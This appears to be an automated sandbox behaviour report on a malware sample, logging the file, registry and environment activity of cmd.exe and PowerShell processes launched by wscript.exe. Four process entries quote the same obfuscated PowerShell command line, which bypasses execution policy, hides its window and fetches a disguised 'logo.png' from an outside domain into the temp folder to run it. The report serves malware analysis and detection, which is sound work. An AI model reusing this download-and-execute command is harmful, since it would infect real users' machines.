Get Time type = Ticks, time = 166936 True 12
Fn
Get Time type = Ticks, time = 167061 True 5
Fn
Get Time type = Ticks, time = 167077 True 6
Fn
Get Time type = Ticks, time = 167092 True 4
Fn
Get Time type = Ticks, time = 167217 True 3
Fn
Get Time type = Ticks, time = 167233 True 3
Fn
Get Time type = Ticks, time = 167248 True 1
Fn
Get Time type = Ticks, time = 167326 True 1
Fn
Get Time type = Ticks, time = 167357 True 3
Fn
Get Info type = Operating System True 3
Fn
Get Info type = Hardware Information True 1
Fn
Process #29: cmd.exe
57 0
»
Information Value
ID #29
File Name c:\windows\system32\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:34, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:02:51
OS Process Information
»
Information Value
PID 0x828
Parent PID 0x154 (c:\windows\system32\wscript.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 610
Host Behavior
File (11)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 2
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe os_pid = 0x310, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4ac50000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77040000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77056d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x770523d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77048290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x770517e0 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:38 (UTC) True 1
Fn
Get Time type = Ticks, time = 166484 True 1
Fn
Get Time type = Performance Ctr, time = 22082414949 True 1
Fn
Environment (15)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 5
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp True 2
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Documents True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Process #30: powershell.exe
276 0
»
Information Value
ID #30
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:36, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:02:49
OS Process Information
»
Information Value
PID 0x310
Parent PID 0x828 (c:\windows\system32\cmd.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 6BC
0x 8F8
0x 8BC
0x B00
0x B14
0x B08
0x D14
Host Behavior
File (49)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config type = file_attributes False 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 7
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 2530 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 542, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 0 True 1
Fn
Registry (87)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key PowerShell - False 1
Fn
Open Key Windows PowerShell - True 1
Fn
Open Key Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Read Value - value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value - value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Filename - file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
User (10)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = aETAdzjz True 9
Fn
System (6)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (58)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 52
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\aETAdzjz True 1
Fn
Set Environment String name = PSExecutionPolicyPreference, value = Bypass True 1
Fn
Process #31: cmd.exe
57 0
»
Information Value
ID #31
File Name c:\windows\system32\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:38, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:02:47
OS Process Information
»
Information Value
PID 0x9fc
Parent PID 0xa34 (c:\windows\system32\wscript.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 9EC
Host Behavior
File (13)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 2
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Get Info PowErshelL.eXe type = file_attributes False 1
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 3
Fn
Write STD_ERROR_HANDLE size = 106 True 1
Fn
Data
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4ac50000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77040000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77056d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x770523d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77048290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x770517e0 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:42 (UTC) True 1
Fn
Get Time type = Ticks, time = 170103 True 1
Fn
Get Time type = Performance Ctr, time = 22445504881 True 1
Fn
Environment (14)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 4
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp True 2
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Documents True 1
Fn
Process #32: powershell.exe
293 0
»
Information Value
ID #32
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:40, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:02:45
OS Process Information
»
Information Value
PID 0x4d8
Parent PID 0x9fc (c:\windows\system32\cmd.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 67C
0x 644
0x 248
0x 89C
0x 210
0x 7B8
0x 9AC
Host Behavior
File (74)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config type = file_attributes False 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 1
Fn
